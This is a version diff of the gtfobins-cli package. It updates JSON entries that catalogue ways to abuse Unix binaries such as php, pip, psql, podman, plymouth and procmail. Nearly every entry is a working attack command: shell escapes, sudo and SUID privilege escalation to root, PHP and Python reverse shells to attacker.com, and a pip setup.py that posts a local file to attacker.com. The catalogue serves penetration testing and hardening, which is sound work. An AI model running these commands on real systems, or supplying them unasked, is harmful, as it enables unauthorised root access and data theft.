gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/php.json

@@ -2,68 +2,78 @@
   "functions": {
     "shell": [
       {
-        "code": "php -r 'system(\"/bin/sh\");'\n"
+        
+        "code": "export CMD=\"/bin/sh\"\nphp -r 'system(getenv(\"CMD\"));'\n"
       },
       {
-        "code": "php -r 'passthru(\"/bin/sh\");'\n"
+        
+        "code": "export CMD=\"/bin/sh\"\nphp -r 'passthru(getenv(\"CMD\"));'\n"
       },
       {
-        "code": "php -r 'print(shell_exec(\"/bin/sh\"));'\n"
+        
+        "code": "export CMD=\"/bin/sh\"\nphp -r 'print(shell_exec(getenv(\"CMD\")));'\n"
       },
       {
-        "code": "php -r '$r=array(); exec(\"/bin/sh\", $r); print(join(\"\\\\n\",$r));'\n"
+        
+        "code": "export CMD=\"/bin/sh\"\nphp -r '$r=array(); exec(getenv(\"CMD\"), $r); print(join(\"\\\\n\",$r));'\n"
       },
       {
-        "code": "php -r '$h=@popen(\"/bin/sh\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'\n"
+        
+        "code": "export CMD=\"/bin/sh\"\nphp -r '$h=@popen(getenv(\"CMD\"),\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'\n"
       }
     ],
     "command": [
       {
-        "code": "php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"[command]\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'\n"
+        
+        "code": "export CMD=\"id\"\nphp -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(getenv(\"CMD\"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "php -r '$sock=fsockopen(\"[host]\",[port]);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n"
+        "description": "Run `nc -l -p 12345` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nphp -r '$sock=fsockopen(getenv(\"RHOST\"),getenv(\"RPORT\"));exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n"
       }
     ],
     "file-upload": [
       {
         "description": "Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.",
-        "code": "php -S [host]:[port]\n"
+        "code": "LHOST=0.0.0.0\nLPORT=8888\nphp -S $LHOST:$LPORT\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "php -r '$c=file_get_contents(\"[url]\");file_put_contents(\"[file]\", $c);'\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\nphp -r '$c=file_get_contents(getenv(\"URL\"));file_put_contents(getenv(\"LFILE\"), $c);'\n"
       }
     ],
     "suid": [
       {
-        "code": "./php -r \"pcntl_exec('/bin/sh', ['-p']);\"\n"
+        
+        "code": "CMD=\"/bin/sh\"\n./php -r \"pcntl_exec('/bin/sh', ['-p']);\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo php -r \"system('/bin/sh');\"\n"
+        
+        "code": "CMD=\"/bin/sh\"\nsudo php -r \"system('$CMD');\"\n"
       }
     ],
     "capabilities": [
       {
-        "code": "./php -r \"posix_setuid(0); system('/bin/sh');\"\n"
+        
+        "code": "CMD=\"/bin/sh\"\n./php -r \"posix_setuid(0); system('$CMD');\"\n"
       }
     ],
     "file-read": [
       {
-        "code": "php -r 'readfile(\"[file]\");'\n"
+        
+        "code": "export LFILE=file_to_read\nphp -r 'readfile(getenv(\"LFILE\"));'\n"
       }
     ],
     "file-write": [
       {
         "description": "write data to a file, filename should be absolute.",
-        "code": "php -r 'file_put_contents(\"[file]\", \"[data]\");'\n"
+        "code": "export LFILE=file_to_write\nphp -r 'file_put_contents(getenv(\"LFILE\"), \"DATA\");'\n"
       }
     ]
   }

gtfo/data/pic.json

@@ -1,19 +1,28 @@
 {
   "functions": {
+    "file-read": [
+      {
+        "description": "The output is prefixed with a some content as a header.",
+        "code": "LFILE=file_to_read\npic $LFILE\n"
+      }
+    ],
     "shell": [
       {
+        
         "code": "pic -U\n.PS\nsh X sh X\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo pic -U\n.PS\nsh X sh X\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "./pic -U\n.PS\nsh X sh X\n"
       }
     ]
   }
-}
+}

gtfo/data/pico.json

@@ -2,31 +2,35 @@
   "functions": {
     "shell": [
       {
+        
         "code": "pico\n^R^X\nreset; sh 1>&0 2>&0\n"
       },
       {
-        "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
+        "description": "The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.",
         "code": "pico -s /bin/sh\n/bin/sh\n^T\n"
       }
     ],
     "file-write": [
       {
-        "code": "pico [file]\n[data]\n^O\n"
+        
+        "code": "pico file_to_write\nDATA\n^O\n"
       }
     ],
     "file-read": [
       {
-        "code": "pico [file]"
+        
+        "code": "pico file_to_read\n"
       }
     ],
     "limited-suid": [
       {
-        "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
+        "description": "The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.",
         "code": "./pico -s /bin/sh\n/bin/sh\n^T\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo pico\n^R^X\nreset; sh 1>&0 2>&0\n"
       }
     ]

gtfo/data/pidstat.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "command": [
+      {
+        
+        "code": "COMMAND=id\npidstat -e $COMMAND\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "COMMAND=id\nsudo pidstat -e $COMMAND\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "COMMAND=id\n./pidstat -e $COMMAND\n"
+      }
+    ]
+  }
+}

gtfo/data/pip.json

@@ -2,35 +2,40 @@
   "functions": {
     "shell": [
       {
+        "description": "",
         "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\npip install $TF\n"
+      },
+      {
+        "description": "",
+        "code": "TF=$(mktemp -d)\nprintf '#!/bin/bash\\n/bin/bash' > $TF/pwn.sh && chmod +x $TF/pwn.sh\npip config --editor $TF/pwn.sh edit\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\npip install $TF\n"
+        "description": "Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nTF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\npip install $TF\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/setup.py\npip install $TF\n"
+        "description": "Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\nTF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))' > $TF/setup.py\npip install $TF\n"
       },
       {
         "description": "Serve files in the local folder running an HTTP server.",
-        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\npip install $TF\n"
+        "code": "export LPORT=8888\nTF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\npip install $TF\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request. It needs an absolute local file path.",
-        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")' > $TF/setup.py\npip install $TF\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=/tmp/file_to_save\nTF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])' > $TF/setup.py\npip install $TF\n"
       }
     ],
     "file-write": [
       {
         "description": "It needs an absolute local file path.",
-        "code": "TF=$(mktemp -d)\necho \"open('[file]','w+').write('DATA')\" > $TF/setup.py\npip install $TF\n"
+        "code": "export LFILE=/tmp/file_to_save\nTF=$(mktemp -d)\necho \"open('$LFILE','w+').write('DATA')\" > $TF/setup.py\npip install $TF\n"
       }
     ],
     "file-read": [
@@ -41,13 +46,19 @@
     ],
     "library-load": [
       {
+        "description": "",
         "code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' > $TF/setup.py\npip install $TF\n"
       }
     ],
     "sudo": [
       {
+        "description": "",
         "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo pip install $TF\n"
+      },
+      {
+        "description": "",
+        "code": "TF=$(mktemp -d)\nprintf '#!/bin/bash\\n/bin/bash' > $TF/pwn.sh && chmod +x $TF/pwn.sh\nsudo pip config --editor $TF/pwn.sh edit\n"
       }
     ]
   }
-}
+}

gtfo/data/pipx.json

@@ -0,0 +1,25 @@
+{
+  "comment": "pipx can run Python code provided in a local script.",
+  "functions": {
+    "inherit": [
+      {
+        "code": "echo 'import os; os.system(\"/bin/sh -ip\")' >/path/to/file.py\npipx run /path/to/file.py\n",
+        "comment": "This runs Python code (`import os; os.system(\"/bin/sh -ip\")`) from the specified file.",
+        "contexts": {
+          "sudo": {},
+          "unprivileged": {}
+        },
+        "from": "python"
+      }
+    ],
+    "shell": [
+      {
+        "code": "pipx run /path/to/file.py\n",
+        "contexts": {
+          "sudo": {},
+          "unprivileged": {}
+        }
+      }
+    ]
+  }
+}

gtfo/data/pkexec.json

@@ -2,8 +2,9 @@
   "functions": {
     "sudo": [
       {
-        "code": "sudo pkexec /bin/sh"
+        
+        "code": "sudo pkexec /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/pkg.json

@@ -2,7 +2,7 @@
   "functions": {
     "sudo": [
       {
-        "description": "It runs commands using a specially crafted FreeBSD package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF\n```",
+        "description": "It runs commands using a specially crafted FreeBSD package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF\n```\n",
         "code": "sudo pkg install -y --no-repo-update ./x-1.0.txz\n"
       }
     ]

gtfo/data/plymouth.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "To achieve code execution, it is required that `plymouthd` is already running as root or can be started as root (with sudo\nor equivalent). It is also required to have tty access to input characters such as keyboard access to the machine. It is\nusually best to save the following code snipet to a script (e.g. `priv-esc.sh`) and execute that as the first command\nwill take over the TTY and you will loose terminal access (if executed from the same TTY) until `hide-splash`.\n\n`show-splash` is used to take control over the TTY and display the splash screen. `pause-progress` is used to prevent\nplymouth from automatically quiting in some cases as we are already booted. `ask-for-password` will ask the user for a\ntext password (usually to decrypt a LUKS disk encryption). We can tell plymouth to send this input to any program, such\nas `/bin/sh` to execute whatever input we gave. Then run `hide-splash` to hide the splash screen and return to normal.\n",
+        "code": "sudo plymouth show-splash\nsudo plymouth pause-progress\nsudo plymouth ask-for-password --prompt='Execute root command:' --command=/bin/sh\nsudo plymouth hide-splash\n"
+      }
+    ]
+  }
+}

gtfo/data/podman.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "The resulting is a root shell.",
+        "code": "sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh\n"
+      }
+    ]
+  }
+}

gtfo/data/poetry.json

@@ -0,0 +1,26 @@
+{
+  "comment": "Poetry can run Python code from a project using `poetry run`.",
+  "functions": {
+    "inherit": [
+      {
+        "code": "mkdir /path/to/project\ncd /path/to/project\npoetry init -n\necho 'import os; os.system(\"/bin/sh -ip\")' >file.py\npoetry run python ./file.py\n",
+        "comment": "This runs Python code (`import os; os.system(\"/bin/sh -ip\")`) from the specified file.",
+        "contexts": {
+          "unprivileged": {},
+          "sudo": {}
+        },
+        "from": "python"
+      }
+    ],
+    "shell": [
+      {
+        "code": "mkdir /path/to/project\ncd /path/to/project\npoetry init -n\necho 'import os; os.system(\"/bin/sh -ip\")' >file.py\npoetry run python file.py\n",
+        "comment": "If the script launches a shell, it is executed in the current context.",
+        "contexts": {
+          "unprivileged": {},
+          "sudo": {}
+        }
+      }
+    ]
+  }
+}

gtfo/data/posh.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "posh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./posh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo posh\n"
+      }
+    ]
+  }
+}

gtfo/data/pr.json

@@ -1,19 +1,21 @@
 {
-  "description": "Some bytes are altered so it might not be suitable for binary files.",
   "functions": {
     "file-read": [
       {
-        "code": "pr -T [file]\n"
+        
+        "code": "LFILE=file_to_read\npr -T $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "pr -T [file]\n"
+        
+        "code": "LFILE=file_to_read\npr -T $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "pr -T [file]\n"
+        
+        "code": "LFILE=file_to_read\npr -T $LFILE\n"
       }
     ]
   }

gtfo/data/procmail.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "By modifying/creating a procmailrc configuration file, we can specify a processing rule for any command we want.",
+        "code": "echo -e ':0\\n| chmod u+s /bin/bash' > .procmailrc\necho \"gtfobins\" | sudo procmail -m .procmailrc\nbash -p\n"
+      }
+    ]
+  }
+}

gtfo/data/pry.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
+        
         "code": "pry\nsystem(\"/bin/sh\")\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo pry\nsystem(\"/bin/sh\")\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "./pry\nsystem(\"/bin/sh\")\n"
       }
     ]
   }
-}
+}

gtfo/data/psftp.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "psftp\n!/bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "sudo psftp\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo psftp\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/psql.json

@@ -1,14 +1,27 @@
 {
-  "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
   "functions": {
     "shell": [
       {
+        "description": "",
         "code": "psql\n\\?\n!/bin/sh\n"
+      },
+      {
+        "description": "",
+        "code": "psql\n\\! /bin/sh\n"
       }
     ],
     "sudo": [
       {
+        "description": "",
         "code": "psql\n\\?\n!/bin/sh\n"
+      },
+      {
+        "description": "",
+        "code": "psql\n\\! /bin/sh\n"
+      },
+      {
+        "description": "",
+        "code": "sudo psql\n\\?\n!/bin/sh\n"
       }
     ]
   }

gtfo/data/ptx.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nptx -w 5000 \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./ptx -w 5000 \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo ptx -w 5000 \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/puppet.json

@@ -2,25 +2,27 @@
   "functions": {
     "shell": [
       {
+        
         "code": "puppet apply -e \"exec { '/bin/sh -c \\\"exec sh -i <$(tty) >$(tty) 2>$(tty)\\\"': }\"\n"
       }
     ],
     "file-write": [
       {
         "description": "The file path must be absolute.",
-        "code": "puppet apply -e \"file { '[file]': content => 'DATA' }\"\n"
+        "code": "LFILE=\"/tmp/file_to_write\"\npuppet apply -e \"file { '$LFILE': content => 'DATA' }\"\n"
       }
     ],
     "file-read": [
       {
-        "description": "The read file content is corrupted by the `diff` output format. The actual '/usr/bin/diff' command is executed.",
-        "code": "puppet filebucket -l diff /dev/null [file]\n"
+        "description": "The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.",
+        "code": "LFILE=file_to_read\npuppet filebucket -l diff /dev/null $LFILE\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo puppet apply -e \"exec { '/bin/sh -c \\\"exec sh -i <$(tty) >$(tty) 2>$(tty)\\\"': }\"\n"
       }
     ]
   }
-}
+}

gtfo/data/pwsh.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "pwsh\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "export LFILE=file_to_write\npwsh -c '\"DATA\" | Out-File $env:LFILE'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo pwsh\n"
+      }
+    ]
+  }
+}

gtfo/data/pygmentize.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "pygmentize -l text /path/to/input-file",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

gtfo/data/pyright.json

@@ -0,0 +1,32 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "pyright /path/to/input-file",
+        "comment": "Content is leaked as error messages.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      },
+      {
+        "binary": false,
+        "code": "pyright --outputjson /path/to/input-file",
+        "comment": "Content is leaked as error messages in JSON format.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      },
+      {
+        "code": "pyright -w /path/to/input-dir/",
+        "comment": "Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}